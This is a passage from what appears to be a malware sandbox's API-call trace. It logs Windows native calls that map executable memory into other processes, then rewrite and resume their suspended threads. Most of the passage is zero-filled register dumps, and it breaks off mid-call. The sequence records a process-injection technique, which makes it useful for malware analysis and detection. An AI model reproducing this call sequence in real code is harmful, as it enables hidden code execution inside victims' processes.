[190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.600] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0158.600] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x115200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x116000) returned 0x0 [0158.607] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x100, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x115200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x540000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x116000) returned 0x0 [0158.631] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x3160000) returned 0x0 [0158.637] NtClose (Handle=0x108) returned 0x0 [0158.637] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x36fb68, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x36fb10, Eip=0x5c2707, SegCs=0x23, EFlags=0x246, Esp=0x36faf4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.637] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0158.637] NtClose (Handle=0x100) returned 0x0 [0158.637] NtClose (Handle=0x104) returned 0x0 [0158.638] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbcc, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0158.638] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0158.638] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0158.638] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0158.639] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0158.640] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xbd0) | out: ThreadHandle=0x19ea68*=0x100) returned 0x0 [0158.640] NtSuspendThread (in: ThreadHandle=0x100, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0158.640] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x23f0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0158.645] NtGetContextThread (in: ThreadHandle=0x100, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1df970, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x1df918, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x1df8fc, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.645] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0158.645] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x1a6200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: 